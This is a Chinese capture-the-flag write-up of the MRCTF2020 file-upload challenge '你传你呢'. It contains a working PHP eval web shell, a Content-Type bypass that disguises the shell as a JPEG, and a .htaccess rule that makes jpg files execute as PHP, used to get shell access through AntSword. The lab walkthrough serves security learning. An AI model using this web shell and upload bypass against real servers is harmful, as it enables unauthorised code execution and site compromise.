[MRCTF2020]你传你呢

解题步骤

​ 由首页得,该题目为文件上传漏洞类型,首先上传一个名为flag.php的木马文件,其内容为:

<?php
    eval($_POST['x']);
?>

​ 通过 Burpsuite 抓包测试,当不符合传输条件时会出现以下回显代码:

在这里插入图片描述

​ 我们修改文件后缀,使得文件名为flag.jpg,以及Content-Type内容为image/jpeg,并成功上传:

在这里插入图片描述

​ 我们可以想到使用 .htaccess 配置文件来使得上传的文件变为 PHP 文件类型,故创建一个 .htaccess 文件,其内容为:

AddType application/x-httpd-php jpg

​ 该文件可以使得所有后缀为 jpg 的文件解析为 PHP 文件,我们通过抓包并修改Content-Typeimage/jpeg并成功上传该文件:

在这里插入图片描述

​ 然后根据数据包中文件路径,通过蚁剑连接:

在这里插入图片描述

最后得到 flag:

在这里插入图片描述

小结

​ 一开始想到了使用 .htaccess,但是用如下代码构造了 .htaccess 文件:

<FilesMatch "XXE">
    SetHander application/x-httpd-php
</FilesMatch>

导致后序渗透不太理想,最后通过参考其他人的解题思路,重新构造了 .htaccess 文件,才成功对flag.jpg解析成功,最后的到了flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丙戌年1101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值